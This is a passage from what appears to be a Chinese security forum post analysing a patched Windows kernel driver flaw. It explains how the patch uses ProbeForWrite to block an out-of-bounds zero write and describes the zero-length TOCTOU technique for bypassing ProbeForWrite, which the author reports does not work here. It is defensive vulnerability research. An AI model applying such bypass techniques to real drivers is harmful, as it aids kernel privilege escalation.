        uVar5 = uVar6;
      }
    }
  }
}

Feature_1543900478__private_IsEnabled函数返回值为0,则会如同之前漏洞版本的驱动一下可以进行越界写0。在打完补丁返回值为1后,则进入else中,使用ProbeForWrite对我们传入的内核地址进行检查。ProbeForWrite的函数函数原型为:

1
2
3
4
5
void ProbeForWrite(
  [in, out] volatile VOID *Address,
  [in]      SIZE_T        Length,
  [in]      ULONG         Alignment
);

该函数的作用是:

  1. 检查缓存长度不为0后,检查内存是否按指定的字节数对齐
  2. 检查整个缓存区是否位于用户态内存范围内

这两个检查任意一个不成功,该函数都会引发一个异常(例如违规访问)。像是我们之前直接传入内核地址在这里就会触发异常,因此补丁之后无法触发漏洞。

ProbeForWrite 绕过手法

假如有下面这样一个例子:

1
2
3
ProbeForWrite ( OutputBuffer,
                OutputBufferLength, //  [1] length could be zero and this will be bypassed even with a kernel mode address
                sizeof (UCHAR));

如果使用addr=kernelmode, size=0则可用于绕过 ProbeForWrite 检查,这是TOCTOU的利用手法。在 ProbeForWrite 检查和操作之间有一个时间窗口,在这个窗口期内,初始验证的条件可能被改变,从而导致 ProbeForWrite 检查被绕过。具体分为两个阶段:

  1. 验证阶段:在此阶段驱动程序使用 ProbeForWrite 函数来验证用户提供的内存范围是否为可写的用户模式地址。如果攻击者为 ProbeForWrite 提供一个地址为内核模式且大小为0的范围,由于大小为0,这次调用不会引发异常(因为实际上没有内存被访问或验证)。
  2. 使用阶段:尽管初始的内存范围验证看似成功,但驱动程序如果后续使用与初次验证不同的参数来执行相同的内核模式地址来进行写入,最后就能够达到绕过 ProbeForWrite 检查的效果。

但是当前补丁中无法直接控制该参数,并且在前面的判断中要求InputBufferLength必须大于0x24,目前在这里没有找到绕过方法:
image.png

总结

这是一个比较经典的漏洞类型,值得学习。文中仍有很多不足,感谢师傅们的指点和帮助,以后定会对文章内容严格把控,如有问题,多多包涵,欢迎提出建议和意见。

参考链接

CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
Microsoft Windows Server 2003 SP2 本地提权(CVE-2014-4076)
MS08-066 : Catching and fixing a ProbeForRead / ProbeForWrite bypass
https://forum.butian.net/share/3101


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2024-6-19 08:21 被bwner编辑 ,原因: update
收藏
免费 5
支持
分享
最新回复 (1)
雪    币: 14316
活跃值: (16677)
能力值: (RANK:730 )
在线值:
发帖
回帖
粉丝
2
师傅太细了!赞!
2024-6-18 20:29
1
游客
登录 | 注册 方可回帖
返回
//